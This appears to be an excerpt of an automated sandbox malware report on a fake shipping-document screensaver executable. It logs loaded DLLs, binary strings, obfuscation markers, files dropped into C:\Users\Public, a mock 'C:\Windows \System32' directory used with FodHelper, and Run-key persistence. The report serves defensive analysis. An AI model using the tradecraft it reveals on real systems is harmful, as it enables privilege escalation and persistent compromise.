Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: appresolver.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: bcp47langs.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: slc.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: pcacli.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\glrkszlG.pif Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows \System32\per.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Static file information: File size 1050624 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 
0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source: Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source: Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 
0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr

Data Obfuscation

Source: C:\Users\Public\Libraries\glrkszlG.pif Unpacked PE file: 1.2.glrkszlG.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
Source: Yara match File source: 39.2.Glzskrlg.PIF.2a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.2a20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: glrkszlG.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_279567B9
Source: alpha.exe.4.dr Static PE information: section name: .didat
Source: per.exe.12.dr Static PE information: section name: .imrsiv
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40102806 push ecx; ret 0_2_40102819
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx 0_2_028BD2E9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028CA2FC push 028CA367h; ret 0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A32FC push eax; ret 0_2_028A3338
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028CA2F5 push 028CA367h; ret 0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A635A push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A635C push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A6748 push 028A678Ah; ret 0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A6746 push 028A678Ah; ret 0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028AC4FC push ecx; mov dword ptr [esp], edx 0_2_028AC501
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028AD530 push 028AD55Ch; ret 0_2_028AD554
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028ACB7C push 028ACD02h; ret 0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B789C push 028B7919h; ret 0_2_028B7911
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028AC8AA push 028ACD02h; ret 0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B68D8 push 028B6983h; ret 0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B68D6 push 028B6983h; ret 0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028C9874 push 028C9A60h; ret 0_2_028C9A58
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B9EBB push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B9EBC push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B2EF0 push 028B2F66h; ret 0_2_028B2F5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B5E0C push ecx; mov dword ptr [esp], edx 0_2_028B5E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B2FFB push 028B3049h; ret 0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B2FFC push 028B3049h; ret 0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7F18 push 028B7F50h; ret 0_2_028B7F48
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7C7C push 028B7CBEh; ret 0_2_028B7CB6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279787DE push dword ptr [ebx]; iretd 0_2_279787E1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27974E56 push ecx; ret 0_2_27974E69
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2798DD28 push esp; retf 0_2_2798DD30

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File created: C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Glzskrlg.PIF
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\per.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe

Boot Survival

Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW, 0_2_2795AB0D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Glzskrlg
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27975E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_27975E5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\glrkszlG.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\alpha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
